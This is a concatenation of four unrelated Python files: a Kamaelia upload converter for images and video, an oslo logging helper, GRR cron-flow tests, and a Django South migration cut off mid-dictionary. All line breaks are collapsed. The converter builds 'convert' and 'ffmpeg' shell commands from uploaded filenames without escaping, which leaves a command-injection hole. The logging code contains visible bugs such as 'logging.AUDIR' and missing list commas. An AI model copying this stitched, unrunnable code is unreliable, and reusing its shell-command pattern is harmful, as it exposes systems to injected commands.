#!/usr/bin/python # -*- coding: utf-8 -*- # Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1) # # (1) Kamaelia Contributors are listed in the AUTHORS file and at # http://www.kamaelia.org/AUTHORS - please extend this file, # not this notice. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import time import Axon import Image from Kamaelia.Chassis.Pipeline import Pipeline from Kamaelia.File.UnixProcess import UnixProcess class DirectoryWatcher(Axon.ThreadedComponent.threadedcomponent): watch = "uploads" def main(self): S = None while True: N = os.stat(self.watch) if S != N: if S != None: if S.st_mtime != N.st_mtime: print "uploads changed, processing", S==N, list(S), list(N) S = N self.send(self.watch, "outbox") else: print "initialising, checking uploads", S==N, S, list(N) S = N self.send(self.watch, "outbox") time.sleep(1) class FileProcessor(Axon.Component.component): Inboxes = { "inbox": "-", "control": "-", "_unixprocessdone": "-", } def Inline(self, X, outbox="outbox", signal="signal", inbox="inbox", control="control"): def Y(X, outbox,signal,inbox,control): L1 = self.link((X, signal), (self, control)) L2 = self.link((X, outbox), (self, inbox)) X.activate() yield 1 while not self.dataReady(control): yield 1 self.recv(control) self.unlink(L1) self.unlink(L2) del X return Axon.Ipc.WaitComplete(Y(X,outbox,signal,inbox,control)) def system(self, command): return self.Inline( UnixProcess(command+";sleep 0.2"), control="_unixprocessdone" ) def processfile(self, directory, filename): print " ... processing:", filename yield 1 def processfiles(self, directory): print "Directory changed: ", directory for filename in os.listdir(directory): for i in self.processfile(directory, filename): yield i def main(self): while True: while not self.anyReady(): self.pause() yield 1 for message in self.Inbox("inbox"): for i in self.processfiles(message): yield i yield 1 class ImageTranscoder(FileProcessor): destdir = "moderate" sizes = { "large" : 626, "normal" : 466, "medium" : 306, "thumb" : 146, "minithumb" : 66, "microthumb" : 18, } def processfile(self, directory, filename): thefile = filename[:filename.rfind(".")] file_ending = filename[filename.rfind("."):] print thefile try: os.makedirs( os.path.join( self.destdir , thefile ) ) except OSError: return sourcefile = os.path.join(directory, filename) try: X = Image.open(sourcefile) size = X.size X = None side_size = min(*size) except IOError: return for size in self.sizes: if size == "microthumb": dest_file1 = self.destdir + "/" + thefile + "/" + "nanothumb" + ".jpg" dest_file2 = self.destdir + "/" + thefile + "/" + size + ".jpg" print "convert %s -crop %dx%d+0+0 -resize 18x %s" % (sourcefile, side_size,side_size, dest_file1) yield self.system( "convert %s -crop %dx%d+0+0 -resize 18x %s" % (sourcefile, side_size,side_size, dest_file1) ) print "convert %s -crop %dx%d+0+0 -resize 40x %s" % (sourcefile, side_size,side_size, dest_file2) yield self.system( "convert %s -crop %dx%d+0+0 -resize 40x %s" % (sourcefile, side_size,side_size, dest_file2) ) else: width = self.sizes[size] dest_filename = size + "-" + filename full_dest_filename = os.path.join(self.destdir, dest_filename) full_dest_filename = self.destdir + "/" + thefile + "/" + size + ".jpg" resize_arg = "-resize %dx" % width print "convert", sourcefile, resize_arg, full_dest_filename yield self.system( " ".join( [ "convert", sourcefile, resize_arg, full_dest_filename ]) ) os.unlink(sourcefile) class ImageMover(FileProcessor): destdir = "/tmp" def processfile(self, directory, filename): extn = filename[filename.rfind("."):].lower() if extn in [ ".jpg", ".jpeg", ".png", ".gif", ".bmp", ".ppm", ".pnm"]: os.rename( os.path.join(directory, filename), os.path.join(self.destdir, filename) ) yield 1 class VideoTranscoder(FileProcessor): destdir = "moderate" conversion = "ffmpeg -i %(sourcefile)s %(deststem)s.flv" template = "player-template.html" def processfile(self, directory, filename): thefile = filename[:filename.rfind(".")] sourcefile = os.path.join(directory, filename) command = self.conversion % { "sourcefile" : sourcefile, "deststem" : self.destdir + "/" + thefile, } yield self.system( command ) F = open(self.template) t = F.read() F.close() X = t % {"videofile" : thefile + ".flv" } F = open(self.destdir + "/" + thefile + ".html", "w") F.write(X) F.close() os.unlink(sourcefile) class VideoMover(FileProcessor): destdir = "/tmp" extensions = [ ".3gp", ".3gp2", ".3gpp", ".asf", ".asx", ".avi", ".dv", ".flv", ".m1v", ".m4e", ".m4u", ".m4v", ".mjp", ".moov", ".mov", ".movie", ".mp4", ".mpe", ".mpeg", ".mpg", ".qt", ".rm", ".swf", ".ts", ".wmv"] def processfile(self, directory, filename): extn = filename[filename.rfind("."):].lower() if extn.lower() in self.extensions: os.rename( os.path.join(directory, filename), os.path.join(self.destdir, filename) ) yield 1 def read_config(filename): conf = {} try: F = open(filename) for line in F: line = line.strip().rstrip() if line == "": continue if line[0] == "#": continue try: key, value = line.split() conf[key] = value except: print "BAD CONFIG LINE: ", repr(line) F.close() except: print "General error parsing", filename return conf conf = {} default_conf = { "main_incoming_queue" : "/tmp/uploads", "image_queue" : "/tmp/uploads/images", "video_queue" : "/tmp/uploads/videos", "image_moderation_queue" : "/tmp/moderate/images", "video_moderation_queue" : "/tmp/moderate/videos", } local_def_conf = read_config("/etc/batch_converter.conf.dist") local_conf = read_config("/etc/batch_converter.conf") conf.update(default_conf) conf.update(local_def_conf) conf.update(local_conf) Pipeline( DirectoryWatcher(watch = conf["main_incoming_queue"]), ImageMover(destdir = conf["image_queue"]), ).activate() Pipeline( DirectoryWatcher(watch = conf["image_queue"]), ImageTranscoder(destdir = conf["image_moderation_queue"]), ).activate() Pipeline( DirectoryWatcher(watch = conf["main_incoming_queue"]), VideoMover(destdir = conf["video_queue"]), ).activate() Pipeline( DirectoryWatcher(watch = conf["video_queue"]), VideoTranscoder(destdir = conf["video_moderation_queue"]), ).run()
#!/usr/bin/env python #encode=utf-8 #vim: tabstop=4 shiftwidth=4 softtabstop=4 #Created on 2013-8-17 #Copyright 2013 nuoqingyun xuqifeng import logging import logging.handlers import os import sys import stat import inspect from oslo.config import cfg log_opts = [ cfg.BoolOpt('use_syslog', default = 'False', help=""), cfg.BoolOpt('debug', default=False, help=""), cfg.BoolOpt('verbose', default=True, help=""), cfg.BoolOpt('use_stderr', default='False', help=""), cfg.StrOpt('logfile_mode', default='0644', help="the default log file mode"), cfg.StrOpt('log_file', default='/var/log/glance.log', help = ""), cfg.StrOpt('log_date_format', default='%Y-%m-%d %H:%M:%S', help=''), cfg.StrOpt('log_format', default='%(asctime)s %(levelname)8s [%(name)s] %(message)s', help=''), cfg.ListOpt('default_log_levels', default=[ 'amqplib=WARN', 'sqlalchemy=WARN', 'suds=INFO' 'eventlet.wsgi.server=WARN' ], help='list of logger pairs'), cfg.StrOpt('syslog_log_facility', default='LOG_USER', help='syslog facility to receive log lines'), cfg.StrOpt('log-dir', default='', help=''), ] CONF = cfg.CONF CONF.register_opts(log_opts) _loggers = {} class ColorHandler(logging.StreamHandler): LEVEL_COLORS = { logging.DEBUG: '\033[00;32m', logging.INFO: '\033[00;36m', # logging.AUDIT: '\033[01:36m', logging.WARN: '\033[01;33m', logging.ERROR: '\033[01;31m', logging.CRITICAL: '\033[01;31m', } def format(self, record): record.color = self.LEVEL_COLORS[record.levelno] return logging.StreamHandler.format(self, record) class LegacyFormatter(logging.Formatter): def format(self, record): self._fmt = CONF.logging_default_format_string if (record.levelno == logging.DEBUG and CONF.logging_debug_format_stuffix): self._fmt class ContextAdapter(logging.LoggerAdapter): def __init__(self, logger, project_name, version): self.logger = logger self.project = project_name self.version = version @property def handlers(self): return self.logger.handlers def audit(self, msg, *args, **kwargs): self.log(logging.AUDIR, msg, *args, **kwargs) def deprecated(self, msg, *args, **kwargs): pass def process(self, msg, kwargs): if 'extra' not in kwargs: kwargs['extra'] = {} extra = kwargs['extra'] extra.update({'sitename': self.project}) extra.update({'project':self.project}) extra.update({'version': self.version}) extra['extra'] = extra.copy() return msg, kwargs def _setup_logging_from_conf(product_name): log_root = getLogger(None).logger for handler in log_root.handlers: log_root.removeHandler(handler) if CONF.use_syslog: facility = _find_facility_from_conf() syslog = logging.handlers.SysLogHandler(address='/dev/log', facility=facility) log_root.addHandler(syslog) log_path = _get_log_file_path() if log_path: filelog = logging.handlers.WatchedFileHandler(log_path) log_root.addHandler(filelog) mode = int(CONF.logfile_mode, 8) st = os.stat(log_path) if st.st_mode != (stat.S_IFREG| mode): os.chmod(log_path, mode) if CONF.use_stderr: streamlog = ColorHandler() log_root.addHandler(streamlog) elif not CONF.log_file: streamlog = logging.StreamHandler(sys.stdout) log_root.addHandler(streamlog) for handler in log_root.handlers: dateformat = CONF.log_date_format if CONF.log_format: handler.setFormatter(logging.Formatter(fmt=CONF.log_format, datefmt = dateformat)) #handler.setFormatter() if CONF.debug: log_root.setLevel(logging.DEBUG) elif CONF.verbose: log_root.setLevel(logging.INFO) else: log_root.setLevel(logging.WARNING) level = logging.NOTSET for pair in CONF.default_log_levels: mode, _set, level_name = pair.partition('=') level = logging.getLevelName(level_name) logger = logging.getLogger(mode) logger.setLevel(level) for handler in log_root.handlers: logger.addHandler(handler) def setup(product_name): _setup_logging_from_conf(product_name) def _find_facility_from_conf(): facility_names = logging.handlers.SysLogHandler.facility_names facility = getattr(logging.handlers.SysLogHandler, CONF.syslog_log_facility, None) if facility is None and CONF.syslog_log_facility in facility_names: facility = facility_names.get(CONF.syslog_log_facility) return facility def _get_binary_name(): return os.path.basename(inspect.stack()[-1][1]) def _get_log_file_path(binary=None): logfile = CONF.log_file logdir = CONF.log_dir if logfile and not logdir: return logfile if logfile and logdir: return os.path.join(logdir, logfile) if logdir: binary = binary or _get_binary_name() return '%s.log' % (os.path.join(logdir, binary)) def getLogger(name='unknown', version='unknown'): print _loggers if name not in _loggers: _loggers[name] = ContextAdapter(logging.getLogger(name), name, version) return _loggers[name] if __name__ == "__main__": setup("glance") log = getLogger("test") print log.logger.handlers log.warning("this is a test logging method")
#!/usr/bin/env python """System cron flows tests.""" from grr.endtoend_tests import base from grr.lib import action_mocks from grr.lib import aff4 from grr.lib import config_lib from grr.lib import flags from grr.lib import flow from grr.lib import test_lib from grr.lib import utils from grr.lib.flows.cron import system from grr.lib.flows.general import endtoend as endtoend_flows from grr.lib.flows.general import endtoend_test from grr.lib.rdfvalues import client as client_rdf from grr.lib.rdfvalues import flows from grr.test_data import client_fixture class SystemCronFlowTest(test_lib.FlowTestsBaseclass): """Test system cron flows.""" def setUp(self): super(SystemCronFlowTest, self).setUp() # We are only interested in the client object (path = "/" in client VFS) fixture = test_lib.FilterFixture(regex="^/$") # Make 10 windows clients for i in range(0, 10): test_lib.ClientFixture("C.0%015X" % i, token=self.token, fixture=fixture) with aff4.FACTORY.Open( "C.0%015X" % i, mode="rw", token=self.token) as client: client.AddLabels("Label1", "Label2", owner="GRR") client.AddLabels("UserLabel", owner="jim") # Make 10 linux clients 12 hours apart. for i in range(0, 10): test_lib.ClientFixture("C.1%015X" % i, token=self.token, fixture=client_fixture.LINUX_FIXTURE) def _CheckVersionStats(self, label, attribute, counts): fd = aff4.FACTORY.Open("aff4:/stats/ClientFleetStats/%s" % label, token=self.token) histogram = fd.Get(attribute) # There should be counts[0] instances in 1 day actives. self.assertEqual(histogram[0].title, "1 day actives for %s label" % label) self.assertEqual(len(histogram[0]), counts[0]) # There should be counts[1] instances in 7 day actives. self.assertEqual(histogram[1].title, "7 day actives for %s label" % label) self.assertEqual(len(histogram[1]), counts[1]) # There should be counts[2] instances in 14 day actives. self.assertEqual(histogram[2].title, "14 day actives for %s label" % label) self.assertEqual(histogram[2][0].label, "GRR Monitor 1") self.assertEqual(histogram[2][0].y_value, counts[2]) # There should be counts[3] instances in 30 day actives. self.assertEqual(histogram[3].title, "30 day actives for %s label" % label) self.assertEqual(histogram[3][0].label, "GRR Monitor 1") self.assertEqual(histogram[3][0].y_value, counts[3]) def testGRRVersionBreakDown(self): """Check that all client stats cron jobs are run. All machines should be in All once. Windows machines should be in Label1 and Label2. There should be no stats for UserLabel. """ for _ in test_lib.TestFlowHelper("GRRVersionBreakDown", token=self.token): pass histogram = aff4.ClientFleetStats.SchemaCls.GRRVERSION_HISTOGRAM self._CheckVersionStats("All", histogram, [0, 0, 20, 20]) self._CheckVersionStats("Label1", histogram, [0, 0, 10, 10]) self._CheckVersionStats("Label2", histogram, [0, 0, 10, 10]) # This shouldn't exist since it isn't a system label aff4.FACTORY.Open("aff4:/stats/ClientFleetStats/UserLabel", "AFF4Volume", token=self.token) def _CheckOSStats(self, label, attribute, counts): fd = aff4.FACTORY.Open("aff4:/stats/ClientFleetStats/%s" % label, token=self.token) histogram = fd.Get(attribute) # There should be counts[0] instances in 1 day actives. self.assertEqual(histogram[0].title, "1 day actives for %s label" % label) self.assertEqual(len(histogram[0]), counts[0]) # There should be counts[1] instances in 7 day actives. self.assertEqual(histogram[1].title, "7 day actives for %s label" % label) self.assertEqual(len(histogram[1]), counts[1]) # There should be counts[2] instances in 14 day actives for linux and # windows. self.assertEqual(histogram[2].title, "14 day actives for %s label" % label) all_labels = [] for item in histogram[2]: all_labels.append(item.label) self.assertEqual(item.y_value, counts[2][item.label]) self.assertItemsEqual(all_labels, counts[2].keys()) # There should be counts[3] instances in 30 day actives for linux and # windows. self.assertEqual(histogram[3].title, "30 day actives for %s label" % label) all_labels = [] for item in histogram[3]: all_labels.append(item.label) self.assertEqual(item.y_value, counts[3][item.label]) self.assertItemsEqual(all_labels, counts[3].keys()) def testOSBreakdown(self): """Check that all client stats cron jobs are run.""" for _ in test_lib.TestFlowHelper("OSBreakDown", token=self.token): pass histogram = aff4.ClientFleetStats.SchemaCls.OS_HISTOGRAM self._CheckOSStats("All", histogram, [0, 0, {"Linux": 10, "Windows": 10}, {"Linux": 10, "Windows": 10}]) self._CheckOSStats("Label1", histogram, [0, 0, {"Windows": 10}, {"Windows": 10}]) self._CheckOSStats("Label2", histogram, [0, 0, {"Windows": 10}, {"Windows": 10}]) def _CheckAccessStats(self, label, count): fd = aff4.FACTORY.Open("aff4:/stats/ClientFleetStats/%s" % label, token=self.token) histogram = fd.Get(fd.Schema.LAST_CONTACTED_HISTOGRAM) data = [(x.x_value, x.y_value) for x in histogram] self.assertEqual(data, [ (86400000000L, 0L), (172800000000L, 0L), (259200000000L, 0L), (604800000000L, 0L), (1209600000000L, count), (2592000000000L, count), (5184000000000L, count)]) def testLastAccessStats(self): """Check that all client stats cron jobs are run.""" for _ in test_lib.TestFlowHelper("LastAccessStats", token=self.token): pass # All our clients appeared at the same time (and did not appear since). self._CheckAccessStats("All", count=20L) # All our clients appeared at the same time but this label is only half. self._CheckAccessStats("Label1", count=10L) # All our clients appeared at the same time but this label is only half. self._CheckAccessStats("Label2", count=10L) def testPurgeClientStats(self): max_age = system.PurgeClientStats.MAX_AGE for t in [1 * max_age, 1.5 * max_age, 2 * max_age]: with test_lib.FakeTime(t): urn = self.client_id.Add("stats") stats_fd = aff4.FACTORY.Create(urn, "ClientStats", token=self.token, mode="rw") st = client_rdf.ClientStats(RSS_size=int(t)) stats_fd.AddAttribute(stats_fd.Schema.STATS(st)) stats_fd.Close() stat_obj = aff4.FACTORY.Open( urn, age=aff4.ALL_TIMES, token=self.token, ignore_cache=True) stat_entries = list(stat_obj.GetValuesForAttribute(stat_obj.Schema.STATS)) self.assertEqual(len(stat_entries), 3) self.assertTrue(max_age in [e.RSS_size for e in stat_entries]) with test_lib.FakeTime(2.5 * max_age): for _ in test_lib.TestFlowHelper( "PurgeClientStats", None, client_id=self.client_id, token=self.token): pass stat_obj = aff4.FACTORY.Open( urn, age=aff4.ALL_TIMES, token=self.token, ignore_cache=True) stat_entries = list(stat_obj.GetValuesForAttribute(stat_obj.Schema.STATS)) self.assertEqual(len(stat_entries), 1) self.assertTrue(max_age not in [e.RSS_size for e in stat_entries]) def _SetSummaries(self, client_id): client = aff4.FACTORY.Create(client_id, "VFSGRRClient", mode="rw", token=self.token) client.Set(client.Schema.HOSTNAME(client_id)) client.Set(client.Schema.SYSTEM("Darwin")) client.Set(client.Schema.OS_RELEASE("OSX")) client.Set(client.Schema.OS_VERSION("10.9.2")) client.Set(client.Schema.KERNEL("13.1.0")) client.Set(client.Schema.FQDN("%s.example.com" % client_id)) client.Set(client.Schema.ARCH("AMD64")) client.Flush() def testEndToEndTests(self): self.client_ids = ["aff4:/C.6000000000000000", "aff4:/C.6000000000000001", "aff4:/C.6000000000000002"] for clientid in self.client_ids: self._SetSummaries(clientid) self.client_mock = action_mocks.ActionMock("ListDirectory", "StatFile") config_lib.CONFIG.Set("Test.end_to_end_client_ids", self.client_ids) with utils.MultiStubber((base.AutomatedTest, "classes", {"MockEndToEndTest": endtoend_test.MockEndToEndTest}), (system.EndToEndTests, "lifetime", 0)): # The test harness doesn't understand the callstate at a later time that # this flow is doing, so we need to disable check_flow_errors. for _ in test_lib.TestFlowHelper("EndToEndTests", self.client_mock, client_id=self.client_id, check_flow_errors=False, token=self.token): pass test_lib.TestHuntHelperWithMultipleMocks({}, check_flow_errors=False, token=self.token) hunt_ids = list(aff4.FACTORY.Open("aff4:/hunts", token=self.token).ListChildren()) # We have only created one hunt, and we should have started with clean aff4 # space. self.assertEqual(len(hunt_ids), 1) hunt_obj = aff4.FACTORY.Open(hunt_ids[0], token=self.token, age=aff4.ALL_TIMES) self.assertItemsEqual(sorted(hunt_obj.GetClients()), sorted(self.client_ids)) def _CreateResult(self, success, clientid): success = endtoend_flows.EndToEndTestResult(success=success) return flows.GrrMessage(source=clientid, payload=success) def testEndToEndTestsResultChecking(self): self.client_ids = ["aff4:/C.6000000000000000", "aff4:/C.6000000000000001", "aff4:/C.6000000000000002"] for clientid in self.client_ids: self._SetSummaries(clientid) self.client_mock = action_mocks.ActionMock("ListDirectory", "StatFile") endtoend = system.EndToEndTests(None, token=self.token) endtoend.state.Register("hunt_id", "aff4:/temphuntid") endtoend.state.Register("client_ids", set(self.client_ids)) endtoend.state.Register("client_ids_failures", set()) endtoend.state.Register("client_ids_result_reported", set()) # No results at all self.assertRaises(flow.FlowError, endtoend._CheckForSuccess, []) # Not enough client results endtoend.state.Register("client_ids_failures", set()) endtoend.state.Register("client_ids_result_reported", set()) self.assertRaises(flow.FlowError, endtoend._CheckForSuccess, [self._CreateResult(True, "aff4:/C.6000000000000001")]) # All clients succeeded endtoend.state.Register("client_ids_failures", set()) endtoend.state.Register("client_ids_result_reported", set()) endtoend._CheckForSuccess( [self._CreateResult(True, "aff4:/C.6000000000000000"), self._CreateResult(True, "aff4:/C.6000000000000001"), self._CreateResult(True, "aff4:/C.6000000000000002")]) # All clients complete, but some failures endtoend.state.Register("client_ids_failures", set()) endtoend.state.Register("client_ids_result_reported", set()) self.assertRaises(flow.FlowError, endtoend._CheckForSuccess, [self._CreateResult(True, "aff4:/C.6000000000000000"), self._CreateResult(False, "aff4:/C.6000000000000001"), self._CreateResult(False, "aff4:/C.6000000000000002")]) def main(argv): # Run the full test suite test_lib.GrrTestProgram(argv=argv) if __name__ == "__main__": flags.StartMain(main)
# encoding: utf-8 import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding field 'UserInfo.trust_changed' db.add_column('canvas_userinfo', 'trust_changed', self.gf('canvas.util.UnixTimestampField')(null=True, blank=True), keep_default=False) def backwards(self, orm): # Deleting field 'UserInfo.trust_changed' db.delete_column('canvas_userinfo', 'trust_changed') models = { 'auth.group': { 'Meta': {'object_name': 'Group'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, 'auth.permission': { 'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '254', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, 'canvas.apiapp': { 'Meta': {'object_name': 'APIApp'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}) }, 'canvas.apiauthtoken': { 'Meta': {'unique_together': "(('user', 'app'),)", 'object_name': 'APIAuthToken'}, 'app': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.APIApp']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'token': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}) }, 'canvas.bestof': { 'Meta': {'object_name': 'BestOf'}, 'category': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'best_of'", 'null': 'True', 'blank': 'True', 'to': "orm['canvas.Category']"}), 'chosen_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}), 'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'best_of'", 'to': "orm['canvas.Comment']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'timestamp': ('canvas.util.UnixTimestampField', [], {}) }, 'canvas.category': { 'Meta': {'object_name': 'Category'}, 'description': ('django.db.models.fields.CharField', [], {'max_length': '140'}), 'founded': ('django.db.models.fields.FloatField', [], {'default': '1298956320'}), 'founder': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'founded_groups'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'moderators': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'moderated_categories'", 'symmetrical': 'False', 'to': "orm['auth.User']"}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '20'}), 'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'canvas.comment': { 'Meta': {'object_name': 'Comment'}, 'anonymous': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'author': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'comments'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}), 'category': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'comments'", 'null': 'True', 'blank': 'True', 'to': "orm['canvas.Category']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'ip': ('django.db.models.fields.IPAddressField', [], {'default': "'0.0.0.0'", 'max_length': '15'}), 'judged': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'ot_hidden': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'parent_comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'replies'", 'null': 'True', 'blank': 'True', 'to': "orm['canvas.Comment']"}), 'parent_content': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'comments'", 'null': 'True', 'to': "orm['canvas.Content']"}), 'posted_on_quest_of_the_day': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'replied_comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['canvas.Comment']", 'null': 'True', 'blank': 'True'}), 'reply_content': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'used_in_comments'", 'null': 'True', 'to': "orm['canvas.Content']"}), 'reply_text': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'blank': 'True'}), 'score': ('django.db.models.fields.FloatField', [], {'default': '0', 'db_index': 'True'}), 'skip_moderation': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'timestamp': ('canvas.util.UnixTimestampField', [], {'default': '0'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '140', 'blank': 'True'}), 'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'canvas.commentflag': { 'Meta': {'object_name': 'CommentFlag'}, 'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'flags'", 'to': "orm['canvas.Comment']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}), 'timestamp': ('canvas.util.UnixTimestampField', [], {}), 'type_id': ('django.db.models.fields.IntegerField', [], {}), 'undone': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'flags'", 'to': "orm['auth.User']"}) }, 'canvas.commentmoderationlog': { 'Meta': {'object_name': 'CommentModerationLog'}, 'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Comment']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'moderator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}), 'note': ('django.db.models.fields.TextField', [], {}), 'timestamp': ('canvas.util.UnixTimestampField', [], {}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'moderated_comments_log'", 'to': "orm['auth.User']"}), 'visibility': ('django.db.models.fields.IntegerField', [], {}) }, 'canvas.commentpin': { 'Meta': {'object_name': 'CommentPin'}, 'auto': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Comment']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'timestamp': ('canvas.util.UnixTimestampField', [], {}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}) }, 'canvas.commentsticker': { 'Meta': {'object_name': 'CommentSticker'}, 'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stickers'", 'to': "orm['canvas.Comment']"}), 'epic_message': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '140', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}), 'timestamp': ('canvas.util.UnixTimestampField', [], {}), 'type_id': ('django.db.models.fields.IntegerField', [], {}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}) }, 'canvas.commentstickerlog': { 'Meta': {'object_name': 'CommentStickerLog'}, 'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Comment']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}) }, 'canvas.content': { 'Meta': {'object_name': 'Content'}, 'alpha': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'animated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'id': ('django.db.models.fields.CharField', [], {'max_length': '40', 'primary_key': 'True'}), 'ip': ('django.db.models.fields.IPAddressField', [], {'default': "'0.0.0.0'", 'max_length': '15'}), 'remix_of': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'remixes'", 'null': 'True', 'to': "orm['canvas.Content']"}), 'remix_text': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1000', 'blank': 'True'}), 'source_url': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '4000', 'blank': 'True'}), 'stamps_used': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'used_as_stamp'", 'blank': 'True', 'to': "orm['canvas.Content']"}), 'timestamp': ('canvas.util.UnixTimestampField', [], {}), 'url_mapping': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.ContentUrlMapping']", 'null': 'True', 'blank': 'True'}), 'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'canvas.contenturlmapping': { 'Meta': {'object_name': 'ContentUrlMapping'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}) }, 'canvas.emailunsubscribe': { 'Meta': {'object_name': 'EmailUnsubscribe'}, 'email': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}) }, 'canvas.externalcontent': { 'Meta': {'object_name': 'ExternalContent'}, '_data': ('django.db.models.fields.TextField', [], {'default': "'{}'"}), 'content_type': ('django.db.models.fields.CharField', [], {'max_length': '2'}), 'id': 